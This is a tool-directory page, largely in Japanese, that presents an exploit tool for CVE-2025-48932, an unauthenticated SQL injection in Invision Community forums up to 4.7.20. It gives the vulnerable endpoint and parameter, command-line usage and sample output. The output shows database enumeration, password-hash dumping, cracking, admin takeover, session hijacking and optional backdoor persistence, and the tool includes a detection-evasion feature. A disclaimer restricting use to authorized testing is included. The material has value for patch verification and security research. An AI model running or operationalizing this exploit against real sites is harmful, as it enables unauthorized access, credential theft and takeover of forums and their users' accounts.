Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Invision Community ≤ 4.7.20用の未認証SQLインジェクションエクスプロイト。データベース列挙、資格情報ダンプ、管理者乗っ取り、セッションハイジャック、マルチスレッドによる完全自動化エクスプロイト。依存関係は不要です。Sudeepa Wanigarathnaによるセキュリティ研究ツール。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ポストエクスプロイトウェブセキュリティペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

CVE-2025-48932 - Invision Community ≤ 4.7.20用の未認証SQLインジェクションエクスプロイト。データベース列挙、資格情報ダンプ、管理者乗っ取り、セッションハイジャック、マルチスレッドによる完全自動化エクスプロイト。依存関係は不要です。Sudeepa Wanigarathnaによるセキュリティ研究ツール。

リポジトリを見る
1171ヶ月前未レビュー

🔓 CVE-2025-48932 - Invision Community SQLインジェクションエクスプロイト

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ 重大な脆弱性の概要

CVE-2025-48932 は、Invision Community バージョン ≤ 4.7.20 で発見された認証を必要としない重大なブラインドSQLインジェクション脆弱性です。このエクスプロイトにより、リモートの攻撃者は以下を実行できます:

  • 🔍 機密データベース情報の抽出
  • 👤 ユーザー認証情報とパスワードハッシュの窃取
  • 🔑 管理者アカウントの乗っ取り
  • 🎯 アクティブなユーザーセッションのハイジャック
  • 💻 管理者乗っ取りによるリモートコード実行(RCE)の達成
  • 📊 データベース全体の内容のダンプ

🎯 機能

機能説明ステータス
🚀 依存関係ゼロPure Python標準ライブラリのみ - pip install不要✅
⚡ マルチスレッド設定可能なスレッド数による超高速データ抽出✅
🤖 完全自動化検出からレポート作成までの完全なエクスプロイトチェーン✅
👑 管理者乗っ取りセッションハイジャックと権限昇格✅
🔑 認証情報ダンプユーザー、パスワードハッシュ、メールアドレスの抽出✅
🔓 パスワードクラッキングワードリスト対応の組み込みハッシュクラッキング✅
📋 JSONレポート分析とドキュメント作成のための構造化出力✅
🔌 プロキシサポートBurp Suiteとカスタムプロキシの統合✅
🎨 カラー出力進捗インジケータ付きの見やすいターミナル出力✅
🛡️ レート制限検知を回避するための組み込み遅延✅

📊 デモとスクリーンショット

エクスプロイトの実行

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

JSON出力のサンプル

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 クイックスタートガイド

インストール

# リポジトリをクローン
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# インストールする依存関係はありません!実行するだけです。

基本的な使い方

# ターゲットが脆弱かどうかを確認
python3 exploit.py -u https://example.com --check-only

# 冗長出力による完全なエクスプロイト
python3 exploit.py -u https://example.com -v

# プロキシ使用(Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# 結果をカスタムファイルに保存
python3 exploit.py -u https://example.com -o results.json

# マルチスレッド抽出(より高速)
python3 exploit.py -u https://example.com -t 10

# 利用可能なすべてのデータをダンプ
python3 exploit.py -u https://example.com --dump-all

高度な使い方

# パスワードクラッキング用のカスタムワードリストを使用
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# サイレントモード(出力なし、レポートのみ)
python3 exploit.py -u https://example.com -o silent_report.json

# 詳細なエラーを表示するデバッグモード
python3 exploit.py -u https://example.com -v --debug

📋 要件

システム要件

  • Python: 3.6以上
  • OS: Linux、Windows、macOS(Pythonが動作するあらゆるOS)
  • メモリ: 最小限(約50MB RAM)
  • ストレージ: 約100KB(エクスプロイトのみ)

依存関係

✅ 外部依存関係なし!
✅ Pure Python標準ライブラリのみ!
✅ pip installや仮想環境は不要!

オプション(パスワードクラッキング用)

  • ワードリスト: rockyou.txt または任意のカスタムワードリスト
    # 人気のワードリストをダウンロード
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ 技術的詳細

脆弱性の場所

  • ファイル: /applications/calendar/modules/front/calendar/view.php
  • メソッド: IPS\calendar\modules\front\calendar\view::search()
  • パラメータ: location(ユーザー指定の入力)
  • タイプ: ブールベースのブラインドSQLインジェクション

攻撃ベクター

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

エクスプロイトチェーン

  1. 検出: ブールベースインジェクションの検出
  2. 列挙: データベース構造の抽出
  3. 抽出: 機密データのダンプ
  4. 認証情報の窃取: ユーザー認証情報の抽出
  5. 権限昇格: 管理者アカウントの乗っ取り
  6. セッションハイジャック: アクティブなセッションの窃取
  7. 永続化: バックドアの設置(オプション)

対応データベースバージョン

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 セキュリティと法的通知

⚠️ 重要免責事項

このツールは教育目的および許可されたテスト目的専用です。

このツールを使用することにより、以下に同意したものとみなされます:

  • 所有している、または明示的なテスト許可を得たシステムでのみ使用する
  • 違法または悪意のある目的で使用しない
  • 適用されるすべての法律と規制を遵守する
  • 自身の行動に対する全責任を負う

コンピュータシステムへの不正アクセスは違法かつ非倫理的です。

責任ある開示

  • ベンダー: Invision Community
  • 開示日: 2025年5月16日
  • パッチ適用: バージョン 4.7.21(2025年5月27日)
  • CVE: CVE-2025-48932 割り当て済み

📚 ドキュメント

エクスプロイト引数

引数説明例
-u, --url対象URL(必須)-u https://example.com
-p, --proxyプロキシURL-p http://127.0.0.1:8080
-t, --threadsスレッド数(デフォルト: 5)-t 10
-o, --output結果の出力ファイル-o results.json
-v, --verbose冗長出力を有効にする-v
--check-only脆弱性の確認のみ行う--check-only
--dump-all利用可能なすべてのデータをダンプ--dump-all
--wordlistクラッキング用のワードリストファイル--wordlist rockyou.txt
ツールをダウンロード